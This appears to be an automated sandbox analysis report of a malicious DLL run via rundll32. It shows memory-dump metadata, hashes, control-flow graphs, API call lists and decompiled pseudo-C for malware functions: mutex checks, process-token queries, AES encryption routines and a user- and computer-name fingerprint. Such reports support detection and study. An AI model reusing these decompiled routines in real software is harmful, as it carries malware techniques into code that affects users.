                          Memory Dump Source
                          • Source File: 00000000.00000002.299258392.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.299243472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.299270349.000000000040B000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.299276500.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.299290223.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.299296423.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.299301417.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.299390763.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                          Similarity
                          • API ID: BinaryType
                          • String ID:
                          • API String ID: 3726996659-0
                          • Opcode ID: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                          • Instruction ID: 678d90c2e14f759a0a694654a23e79d3ffc57d339712660e24010735e9a51d0b
                          • Opcode Fuzzy Hash: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                          • Instruction Fuzzy Hash: 424176B0A00205CFDB08DFA8C5953AA7BB1EB45308F64816ED405AF3A1C73AD946CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          Function 05B700DC Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 43 5b700dc-5b70125 RtlInitializeCriticalSection call 5b69394 46 5b70127-5b7014b memset RtlInitializeCriticalSection 43->46 47 5b7014d-5b7014f 43->47 48 5b70150-5b70156 46->48 47->48 49 5b7015c-5b70180 CreateMutexA GetLastError 48->49 50 5b70558-5b70562 48->50 51 5b70182-5b70187 49->51 52 5b7019d-5b7019f 49->52 53 5b7019b 51->53 54 5b70189-5b70196 CloseHandle 51->54 55 5b701a5-5b701b0 call 5b75261 52->55 56 5b70553 52->56 53->52 54->56 57 5b70557 55->57 60 5b701b6-5b701c1 call 5b78452 55->60 56->57 57->50 60->57 63 5b701c7-5b701d9 GetUserNameA 60->63 64 5b701fd-5b7020d 63->64 65 5b701db-5b701f3 RtlAllocateHeap 63->65 67 5b70216-5b70233 NtQueryInformationProcess 64->67 68 5b7020f-5b70214 64->68 65->64 66 5b701f5-5b701fb GetUserNameA 65->66 66->64 70 5b70235 67->70 71 5b70239-5b70248 OpenProcess 67->71 68->67 69 5b7025d-5b70267 68->69 72 5b702a4-5b702a8 69->72 73 5b70269-5b70285 GetShellWindow GetWindowThreadProcessId 69->73 70->71 74 5b70256-5b70257 CloseHandle 71->74 75 5b7024a-5b7024f GetLastError 71->75 78 5b702bd-5b702d4 call 5b6f01f 72->78 79 5b702aa-5b702ba memcpy 72->79 76 5b70297-5b7029e 73->76 77 5b70287-5b7028d 73->77 74->69 75->69 80 5b70251 75->80 76->72 82 5b702a0 76->82 77->76 81 5b7028f-5b70295 77->81 88 5b702d6-5b702da 78->88 89 5b702e1-5b702e7 78->89 79->78 84 5b702ed-5b70329 call 5b79370 call 5b76c1e call 5b8087a 80->84 81->72 82->72 96 5b7033f-5b7034e call 5b6e1b1 84->96 97 5b7032b-5b7033a CreateEventA call 5b7e803 84->97 88->89 91 5b702dc call 5b818c0 88->91 89->57 89->84 91->89 96->57 101 5b70354-5b70367 RtlAllocateHeap 96->101 97->96 101->57 102 5b7036d-5b7038d OpenEventA 101->102 103 5b703af-5b703b1 102->103 104 5b7038f-5b7039e CreateEventA 102->104 105 5b703b2-5b703d9 call 5b773aa 103->105 104->105 106 5b703a0-5b703aa GetLastError 104->106 109 5b70546-5b7054d 105->109 110 5b703df-5b703ed 105->110 106->57 109->57 111 5b703f3-5b7040b call 5b7b6d6 110->111 112 5b7049f-5b704a5 110->112 111->57 128 5b70411-5b70418 111->128 113 5b704a7-5b704ac call 5b8157a call 5b6708f 112->113 114 5b704b1-5b704b8 112->114 113->114 114->56 117 5b704be-5b704c3 114->117 120 5b704c5-5b704cb 117->120 121 5b7051f-5b70544 call 5b773aa 117->121 125 5b704cd-5b704d4 SetEvent 120->125 126 5b704da-5b704f0 RtlAllocateHeap 120->126 121->109 131 5b7054f-5b70550 121->131 125->126 129 5b704f2-5b70519 wsprintfA 126->129 130 5b7051c-5b7051e 126->130 132 5b7042c-5b70440 LoadLibraryA 128->132 133 5b7041a-5b70426 128->133 129->130 130->121 131->56 134 5b70442-5b7046a call 5b7e778 132->134 135 5b7046f-5b70482 call 5b781f1 132->135 133->132 134->135 135->57 139 5b70488-5b70491 135->139 139->114 140 5b70493-5b7049d call 5b688fa 139->140 140->114
                          APIs
                          • RtlInitializeCriticalSection.NTDLL(05B8A428), ref: 05B700FA
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B7012B
                          • RtlInitializeCriticalSection.NTDLL(05FBC2D0), ref: 05B7013C
                            • Part of subcall function 05B75261: RtlInitializeCriticalSection.NTDLL(05B8A400), ref: 05B75285
                            • Part of subcall function 05B75261: RtlInitializeCriticalSection.NTDLL(05B8A3E0), ref: 05B7529B
                            • Part of subcall function 05B75261: GetVersion.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752AC
                            • Part of subcall function 05B75261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752E0
                            • Part of subcall function 05B78452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 05B7846C
                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,05B69100,?), ref: 05B70165
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70176
                          • CloseHandle.KERNEL32(000005C8,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B7018A
                          • GetUserNameA.ADVAPI32(00000000,?), ref: 05B701D3
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B701E6
                          • GetUserNameA.ADVAPI32(00000000,?), ref: 05B701FB
                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 05B7022B
                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70240
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B7024A
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70257
                          • GetShellWindow.USER32 ref: 05B70272
                          • GetWindowThreadProcessId.USER32(00000000), ref: 05B70279
                          • memcpy.NTDLL(05B8A2F4,?,00000018,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B702B5
                          • CreateEventA.KERNEL32(05B8A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05B69100,?), ref: 05B70333
                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 05B7035D
                          • OpenEventA.KERNEL32(00100000,00000000,05FBB9C8,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70385
                          • CreateEventA.KERNEL32(05B8A1E8,00000001,00000000,05FBB9C8,?,?,?,?,?,?,?,05B69100,?), ref: 05B7039A
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B703A0
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70438
                          • SetEvent.KERNEL32(?,05B7C384,00000000,00000000,?,?,?,?,?,?,?,05B69100,?), ref: 05B704CE
                          • RtlAllocateHeap.NTDLL(00000000,00000043,05B7C384), ref: 05B704E3
                          • wsprintfA.USER32 ref: 05B70513
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                          • String ID:
                          • API String ID: 3929413950-0
                          • Opcode ID: 733774fc54bc421096a3ad383b857e2d513d168a2e1baf1a023888cd91616ace
                          • Instruction ID: 9c38c19dc9ba0cf902c7abe8c3f960044adbc3d8f320934df928833a04b37999
                          • Opcode Fuzzy Hash: 733774fc54bc421096a3ad383b857e2d513d168a2e1baf1a023888cd91616ace
                          • Instruction Fuzzy Hash: FEC158B161424CAFC720FF64E88E93A7BAAFB85610B64589FF56687240DB34B444CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01005FBB Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 189 1005fbb-1005ffb CryptAcquireContextW 190 1006001-100603d memcpy CryptImportKey 189->190 191 1006152-1006158 GetLastError 189->191 193 1006043-1006055 CryptSetKeyParam 190->193 194 100613d-1006143 GetLastError 190->194 192 100615b-1006162 191->192 196 1006129-100612f GetLastError 193->196 197 100605b-1006064 193->197 195 1006146-1006150 CryptReleaseContext 194->195 195->192 198 1006132-100613b CryptDestroyKey 196->198 199 1006066-1006068 197->199 200 100606c-1006079 call 1006d63 197->200 198->195 199->200 201 100606a 199->201 204 1006120-1006127 200->204 205 100607f-1006088 200->205 201->200 204->198 206 100608b-1006093 205->206 207 1006095 206->207 208 1006098-10060b5 memcpy 206->208 207->208 209 10060d0-10060df CryptDecrypt 208->209 210 10060b7-10060ce CryptEncrypt 208->210 211 10060e5-10060e7 209->211 210->211 212 10060f7-1006102 GetLastError 211->212 213 10060e9-10060f3 211->213 215 1006104-1006114 212->215 216 1006116-100611e call 1006c2c 212->216 213->206 214 10060f5 213->214 214->215 215->198 216->198
                          C-Code - Quality: 58%
                          			E01005FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x100a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x100a0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E01006D63(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x100a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E01006C2C(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                          0x01005fc4
                          0x01005fca
                          0x01005fcd
                          0x01005fd3
                          0x01005fd3
                          0x01005fd5
                          0x01005fd7
                          0x01005fda
                          0x01005fe0
                          0x01005fe1
                          0x01005fe2
                          0x01005fe8
                          0x01005fed
                          0x01005ff3
                          0x01005ffb
                          0x01006158
                          0x01006001
                          0x01006003
                          0x0100600c
                          0x01006011
                          0x01006023
                          0x01006026
                          0x0100602a
                          0x01006031
                          0x01006035
                          0x0100603d
                          0x01006143
                          0x01006043
                          0x01006043
                          0x01006047
                          0x01006048
                          0x0100604a
                          0x01006055
                          0x0100612f
                          0x0100605b
                          0x0100605b
                          0x0100605e
                          0x01006064
                          0x0100606a
                          0x0100606a
                          0x01006072
                          0x01006074
                          0x01006079
                          0x01006120
                          0x0100607f
                          0x01006085
                          0x01006088
                          0x0100608b
                          0x0100608d
                          0x0100608e
                          0x01006093
                          0x01006095
                          0x01006095
                          0x0100609f
                          0x010060a4
                          0x010060a7
                          0x010060aa
                          0x010060ac
                          0x010060b5
                          0x010060df
                          0x010060b7
                          0x010060c8
                          0x010060c8
                          0x010060e7
                          0x00000000
                          0x00000000
                          0x010060e9
                          0x010060ec
                          0x010060ef
                          0x010060f3
                          0x00000000
                          0x010060f5
                          0x01006104
                          0x0100610a
                          0x01006112
                          0x01006112
                          0x00000000
                          0x010060f3
                          0x010060f7
                          0x010060fd
                          0x01006102
                          0x01006119
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01006102
                          0x01006079
                          0x01006132
                          0x01006135
                          0x01006135
                          0x0100614a
                          0x0100614a
                          0x01006162

                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010024D8,00000001,010058D7,00000000), ref: 01005FF3
                          • memcpy.NTDLL(010024D8,010058D7,00000010,?,?,?,010024D8,00000001,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740), ref: 0100600C
                          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01006035
                          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0100604D
                          • memcpy.NTDLL(00000000,75BCC740,052995B0,00000010), ref: 0100609F
                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,052995B0,00000020,?,?,00000010), ref: 010060C8
                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,052995B0,?,?,00000010), ref: 010060DF
                          • GetLastError.KERNEL32(?,?,00000010), ref: 010060F7
                          • GetLastError.KERNEL32 ref: 01006129
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 01006135
                          • GetLastError.KERNEL32 ref: 0100613D
                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0100614A
                          • GetLastError.KERNEL32(?,?,?,010024D8,00000001,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 01006152
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                          • String ID:
                          • API String ID: 1967744295-0
                          • Opcode ID: d7b80aa1a81afdebc741c7487df500d924cea49662e2021c5e4d7631c032fd07
                          • Instruction ID: 08b374d7569555b77e1952e10d590f629ddbc700592e6e7b9578445e192ab176
                          • Opcode Fuzzy Hash: d7b80aa1a81afdebc741c7487df500d924cea49662e2021c5e4d7631c032fd07
                          • Instruction Fuzzy Hash: DB514071900209FFEB12DFA8DC84AEE7BBAFB04350F048465F945E7281D7768A24DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01003365 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 1003365-1003379 399 1003383-1003395 call 1002119 398->399 400 100337b-1003380 398->400 403 1003397-10033a7 GetUserNameW 399->403 404 10033e9-10033f6 399->404 400->399 405 10033f8-100340f GetComputerNameW 403->405 406 10033a9-10033b9 RtlAllocateHeap 403->406 404->405 407 1003411-1003422 RtlAllocateHeap 405->407 408 100344d-1003471 405->408 406->405 409 10033bb-10033c8 GetUserNameW 406->409 407->408 410 1003424-100342d GetComputerNameW 407->410 411 10033d8-10033e7 HeapFree 409->411 412 10033ca-10033d6 call 100708d 409->412 414 100343e-1003447 HeapFree 410->414 415 100342f-100343b call 100708d 410->415 411->405 412->411 414->408 415->414
                          C-Code - Quality: 96%
                          			E01003365(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x100a310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E01002119( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x100a344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x100a2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E0100708D(_v8 + _v8, _t64);
							}
							HeapFree( *0x100a2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x100a2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0100708D(_v8 + _v8, _t64);
						}
						HeapFree( *0x100a2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                          0x01003365
                          0x0100336d
                          0x01003371
                          0x01003374
                          0x01003379
                          0x0100337b
                          0x01003380
                          0x01003380
                          0x01003386
                          0x01003388
                          0x01003395
                          0x010033f6
                          0x01003397
                          0x0100339c
                          0x010033a2
                          0x010033a7
                          0x010033b5
                          0x010033b9
                          0x010033c8
                          0x010033cf
                          0x010033d6
                          0x010033d6
                          0x010033e1
                          0x010033e1
                          0x010033b9
                          0x010033a7
                          0x010033f8
                          0x010033fe
                          0x01003408
                          0x0100340a
                          0x0100340f
                          0x0100341e
                          0x01003422
                          0x0100342d
                          0x01003434
                          0x0100343b
                          0x0100343b
                          0x01003447
                          0x01003447
                          0x01003422
                          0x01003452
                          0x01003454
                          0x01003457
                          0x01003459
                          0x0100345c
                          0x0100345f
                          0x01003469
                          0x0100346d
                          0x01003471

                          APIs
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0100339C
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 010033B3
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 010033C0
                          • HeapFree.KERNEL32(00000000,00000000), ref: 010033E1
                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01003408
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0100341C
                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01003429
                          • HeapFree.KERNEL32(00000000,00000000), ref: 01003447
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: HeapName$AllocateComputerFreeUser
                          • String ID:
                          • API String ID: 3239747167-0
                          • Opcode ID: 929749c58a8794a544b453386ddbf9ab3d416944dc38a5da1a565cdbf9cea322
                          • Instruction ID: 9cf108739cafc7b5490ad63f51e857b3a668efd9b848c75175a97e1e66aa2aa4
                          • Opcode Fuzzy Hash: 929749c58a8794a544b453386ddbf9ab3d416944dc38a5da1a565cdbf9cea322
                          • Instruction Fuzzy Hash: D9313D71A00305EFE722DFA9DC81BAEB7F9FB48200F518479E585D7251DB35E9019B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B68FEC Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 522 5b68fec-5b68ffe 523 5b69000-5b69006 522->523 524 5b69008 522->524 525 5b6900e-5b69022 call 5b77ac9 523->525 524->525 528 5b69024-5b69032 StrRChrA 525->528 529 5b6905e-5b69088 call 5b6c431 525->529 530 5b69037 528->530 531 5b69034-5b69035 528->531 536 5b690a6-5b690ae 529->536 537 5b6908a-5b6908e 529->537 533 5b6903d-5b69058 _strupr lstrlen call 5b80ee0 530->533 531->533 533->529 538 5b690b5-5b690d3 CreateEventA 536->538 539 5b690b0-5b690b3 536->539 537->536 541 5b69090-5b6909b 537->541 543 5b69107-5b6910d GetLastError 538->543 544 5b690d5-5b690dc call 5b75e8d 538->544 542 5b69113-5b6911a 539->542 541->536 545 5b6909d-5b690a4 541->545 548 5b6911c-5b69123 RtlRemoveVectoredExceptionHandler 542->548 549 5b69129-5b6912e 542->549 547 5b6910f-5b69111 543->547 544->543 551 5b690de-5b690e5 544->551 545->536 545->545 547->542 547->549 548->549 552 5b690e7-5b690f3 RtlAddVectoredExceptionHandler 551->552 553 5b690f8-5b690fb call 5b700dc 551->553 552->553 555 5b69100-5b69105 553->555 555->543 555->547
                          APIs
                          • StrRChrA.SHLWAPI(05FBB5B0,00000000,0000005C,?,?,?), ref: 05B69028
                          • _strupr.NTDLL ref: 05B6903E
                          • lstrlen.KERNEL32(05FBB5B0,?,?), ref: 05B69046
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 05B690C6
                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,05B8076B), ref: 05B690ED
                          • GetLastError.KERNEL32(?,?,?,?), ref: 05B69107
                          • RtlRemoveVectoredExceptionHandler.NTDLL(059805B8), ref: 05B6911D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                          • String ID:
                          • API String ID: 2251957091-0
                          • Opcode ID: 5194b7386555386bfa7bbf5c3a0fb36fe80dd0b824f525c560e26ca592355f79
                          • Instruction ID: 80ae4a1a3fd28e74ee2b37529d2cdd412b465ec467b5f15bb9f8ec4ae29fd2d6
                          • Opcode Fuzzy Hash: 5194b7386555386bfa7bbf5c3a0fb36fe80dd0b824f525c560e26ca592355f79
                          • Instruction Fuzzy Hash: CF310F72914115AFEB20BFB4DC8A97E7F96FB05260B6514A7F612D3140DE39B841CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6C431 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 05B6C478
                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 05B6C48B
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 05B6C4A7
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 05B6C4C4
                          • memcpy.NTDLL(?,00000000,0000001C), ref: 05B6C4D1
                          • NtClose.NTDLL(?), ref: 05B6C4E3
                          • NtClose.NTDLL(?), ref: 05B6C4ED
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 2575439697-0
                          • Opcode ID: 949c907bb95f9dd62674dea9be5fb590597d0f08bf7bb7e267aaaeb17a8dc18e
                          • Instruction ID: 917e38762e715f0e2c9a10ff1466813a33f8fbb0a8669b5a5d742254cfa43db3
                          • Opcode Fuzzy Hash: 949c907bb95f9dd62674dea9be5fb590597d0f08bf7bb7e267aaaeb17a8dc18e
                          • Instruction Fuzzy Hash: 832114B2A10218BBDB11EF95CC45AEEBFBDFF08740F104062F905E6160DB75AA40DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004321 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 38%
                          			E01004321(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E01006D63(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E01006C2C(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                          0x0100432e
                          0x0100432f
                          0x01004330
                          0x01004331
                          0x01004332
                          0x01004336
                          0x0100433d
                          0x0100434c
                          0x0100434f
                          0x01004352
                          0x01004359
                          0x0100435c
                          0x0100435f
                          0x01004362
                          0x01004365
                          0x01004370
                          0x01004372
                          0x0100437b
                          0x01004383
                          0x01004385
                          0x01004397
                          0x010043a1
                          0x010043a5
                          0x010043b4
                          0x010043b8
                          0x010043c1
                          0x010043c9
                          0x010043c9
                          0x010043cb
                          0x010043cb
                          0x010043d3
                          0x010043d9
                          0x010043dd
                          0x010043dd
                          0x010043e8

                          APIs
                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01004368
                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 0100437B
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01004397
